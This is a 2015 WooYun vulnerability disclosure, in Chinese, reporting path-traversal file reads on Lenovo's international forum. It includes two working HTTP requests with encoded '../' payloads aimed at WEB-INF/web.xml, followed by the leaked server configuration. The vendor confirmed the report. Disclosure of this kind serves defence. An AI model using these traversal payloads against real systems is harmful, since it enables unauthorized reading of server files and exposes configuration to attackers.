当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101549

漏洞标题:联想某国际业务任意文件读取打包

相关厂商:联想

漏洞作者: 路人甲

提交时间:2015-03-16 09:48

修复时间:2015-04-30 18:48

公开时间:2015-04-30 18:48

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-16: 细节已通知厂商并且等待厂商处理中
2015-03-16: 厂商已经确认,细节仅向厂商公开
2015-03-26: 细节向核心白帽子及相关领域专家公开
2015-04-05: 细节向普通白帽子公开
2015-04-15: 细节向实习白帽子公开
2015-04-30: 细节向公众公开

简要描述:

详细说明:

国际论坛forums.lenovo.com.
两处打包

GET /lnv/?category.id=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Cache-Control: no-cache
Host: forums.lenovo.com.
Accept-Encoding: gzip, deflate


GET /lnv/board/message?board.id=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d&thread.id=1 HTTP/1.1
Referer: http://forums.lenovo.com./
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: forums.lenovo.com.
Accept-Encoding: gzip, deflate


Content-Length: 16894
Connection: close
Content-Type: text/xml;charset=UTF-8
<?xml version="1.0" encoding="ISO-8859-1"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<display-name>web2</display-name>
<session-config>
<session-timeout>30</session-timeout>
</session-config>
<context-param>
<param-name>jspellLexicons</param-name>
<param-value>res/jspell/</param-value>
</context-param>
<context-param>
<param-name>tapestry.app-package</param-name>
<param-value>lithium.web2</param-value>
</context-param>
<listener>
<listener-class>lithium.servlet.session.ApplicationSessionTrackerHttpSessionListener</listener-class>
<listener-class>lithium.reporting.metrics.unique.UniqueMetricProcessorHttpSessionListener</listener-class>
<listener-class>lithium.user.UserSessionListener</listener-class>
</listener>
<!-- ================================================================= Filters -->
<filter>
<filter-name>characterEncodingFilter</filter-name>
<filter-class>lithium.servlet.CharacterEncodingFilter</filter-class>
</filter>
<filter>
<filter-name>putTomcatRequestFilter</filter-name>
<filter-class>lithium.servlet.PutTomcatRequestinAttributeFilter</filter-class>
</filter>
<filter>
<filter-name>applicationSelectorFilter</filter-name>
<filter-class>lithium.apps.main.container.filters.ApplicationSelectorFilter</filter-class>
</filter>
<filter>
<filter-name>clickjackingFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>p3pHeaderFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>clearStateFilter</filter-name>
<filter-class>lithium.boards.servlet.ClearStateFilter</filter-class>
</filter>
<filter>
<filter-name>trackingFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>

<filter>
<filter-name>operationsLoggingFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>blackboxFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>liaTapestryFilter</filter-name>
<filter-class>lithium.web2.services.servlet.LiaTapestryFilter</filter-class>
</filter>
<filter>
<filter-name>facebookSignedRequestFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>rewriteFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
<init-param>
<param-name>targetFilterLifecycle</param-name>
<param-value>true</param-value>
</init-param>
</filter>

<filter>
<filter-name>httpRequestContextFilter</filter-name>
<filter-class>lithium.servlet.HttpRequestContextFilter</filter-class>
</filter>
<filter>
<filter-name>agentDetectionFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>sessionIdStripperFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>setHeaderValidationFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>metricsFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>requestTransformFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>replicatedSessionFilter</filter-name>
<filter-class>lithium.servlet.session.ReplicatedSessionFilter</filter-class>
</filter>
<filter>
<filter-name>userSessionFilterWeb2</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>

<filter>
<filter-name>realtimeNotificationAuthFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>visitorFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>bannedUserFilterChainWeb2</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>mimeFilter</filter-name>
<filter-class>lithium.servlet.MimeFilter</filter-class>
<init-param>
<param-name>charset.encoding</param-name>
<param-value>UTF-8</param-value>
</init-param>
</filter>
<filter>
<filter-name>clientDeviceDetectionFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>limitFilterChainWeb2</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>funnelFilterChain</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>pageCacheFilterChain</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>forwardedHeadersFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>canonicalIpFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>vanityHostnameRedirectFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>accessCheckFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>notSecureSessionCookieFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>sipDomainRequestManagerFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<filter>
<filter-name>multipartRequestFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<!--
Adds a non-reversible hashed IP as a request attribute lithium.servlet.HashedIpFilter.HASHED_IP_ATTR.
Must come before maskedIpFilter (so it has access to full IP).
-->
<filter>
<filter-name>hashedIpFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<!--
Masks the IP address (wraps the HttpServletRequest) for anonymous requests.
Adds a boolean request attribute lithium.servlet.MaskedIpFilter.IS_MASKED ("true" or "false" depending on if
the IP is masked).
-->
<filter>
<filter-name>maskedIpFilter</filter-name>
<filter-class>lithium.util.http.DelegatingApplicationFilterProxy</filter-class>
</filter>
<!-- =================================================================
Filter Mappings
Determines which filters run for given url patterns or servlet names.
Note that the filters execute in this order.
-->
<filter-mapping>
<filter-name>characterEncodingFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>putTomcatRequestFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<!--
applicationSelectorFilter needs to occur before any filter which depends on a specific application context.
-->
<filter-mapping>
<filter-name>applicationSelectorFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>ERROR</dispatcher>
</filter-mapping>

<filter-mapping>
<filter-name>funnelFilterChain</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<!--
The forwardedHeadersFilter filter needs to be before the canonicalIpFilter filter
since it modifies the request headers.
-->
<filter-mapping>
<filter-name>forwardedHeadersFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<!--
The canonicalIpFilter filter needs to be before any filter that accesses, logs, or otherwise
uses the remoteAddr from the request.
-->
<filter-mapping>
<filter-name>canonicalIpFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>vanityHostnameRedirectFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>p3pHeaderFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>accessCheckFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<!--
the notSecureSessionCookieFilter needs to be before the RewriteFilter
and the UserSessionFilter to prevent infinite redirects
-->
<filter-mapping>
<filter-name>notSecureSessionCookieFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>sipDomainRequestManagerFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>clearStateFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>trackingFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>operationsLoggingFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>

<filter-mapping>
<filter-name>blackboxFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>

<filter-mapping>
<filter-name>facebookSignedRequestFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>rewriteFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>replicatedSessionFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>agentDetectionFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>sessionIdStripperFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>setHeaderValidationFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>metricsFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>requestTransformFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>limitFilterChainWeb2</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>mimeFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>multipartRequestFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>userSessionFilterWeb2</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>

<filter-mapping>
<filter-name>realtimeNotificationAuthFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>visitorFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>bannedUserFilterChainWeb2</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>clientDeviceDetectionFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>pageCacheFilterChain</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>hashedIpFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>maskedIpFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>httpRequestContextFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
<dispatcher>ERROR</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>liaTapestryFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
<dispatcher>ERROR</dispatcher>
</filter-mapping>
<filter-mapping>
<filter-name>clickjackingFilter</filter-name>
<url-pattern>/*</url-pattern>
<dispatcher>REQUEST</dispatcher>
<dispatcher>FORWARD</dispatcher>
</filter-mapping>

<!-- ================================================================= Servlets -->
<servlet>
<servlet-name>javaScriptServlet</servlet-name>
<servlet-class>lithium.util.http.DelegatingApplicationServletProxy</servlet-class>
</servlet>
<servlet>
<servlet-name>cssServlet</servlet-name>
<servlet-class>lithium.util.http.DelegatingApplicationServletProxy</servlet-class>
</servlet>
<!-- ================================================================= Servlet Mappings -->
<servlet-mapping>
<servlet-name>javaScriptServlet</servlet-name>
<url-pattern>/scripts/*</url-pattern>
</servlet-mapping>
<servlet-mapping>
<servlet-name>cssServlet</servlet-name>
<url-pattern>/assets/css/*</url-pattern>
</servlet-mapping>
<!-- ================================================================= Error Page Mappings -->
<error-page>
<error-code>404</error-code>
<location>/errors/error404page</location>
</error-page>
<!-- ================================================================= Mime Mappings -->
<mime-mapping>
<extension>html</extension>
<mime-type>text/html</mime-type>
</mime-mapping>
<mime-mapping>
<extension>css</extension>
<mime-type>text/css</mime-type>
</mime-mapping>
<mime-mapping>
<extension>js</extension>
<mime-type>text/javascript</mime-type>
</mime-mapping>
<mime-mapping>
<extension>gif</extension>
<mime-type>image/gif</mime-type>
</mime-mapping>
<mime-mapping>
<extension>jpg</extension>
<mime-type>image/jpeg</mime-type>
</mime-mapping>
<mime-mapping>
<extension>png</extension>
<mime-type>image/png</mime-type>
</mime-mapping>
<mime-mapping>
<extension>bmp</extension>
<mime-type>image/bmp</mime-type>
</mime-mapping>
<mime-mapping>
<extension>au</extension>
<mime-type>audio/basic</mime-type>
</mime-mapping>
<mime-mapping>
<extension>jad</extension>
<mime-type>text/vnd.sun.j2me.app-descriptor</mime-type>
</mime-mapping>
<mime-mapping>
<extension>jar</extension>
<mime-type>application/java-archive</mime-type>
</mime-mapping>
<mime-mapping>
<extension>cab</extension>
<mime-type>application/java-archive</mime-type>
</mime-mapping>
<mime-mapping>
<extension>xml</extension>
<mime-type>text/xml</mime-type>
</mime-mapping>
<mime-mapping>
<extension>txt</extension>
<mime-type>text/plain</mime-type>
</mime-mapping>
<mime-mapping>
<extension>class</extension>
<mime-type>application/octet-stream</mime-type>
</mime-mapping>
<mime-mapping>
<extension>cacert</extension>
<mime-type>application/x-x509-ca-cert</mime-type>
</mime-mapping>
。。。。。。。。。。。。。
。。。。。。。。。。。。。。。


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-16 15:01

厂商回复:

谢谢您对联想安全工作的支持,我们会尽快修复漏洞

最新状态:

暂无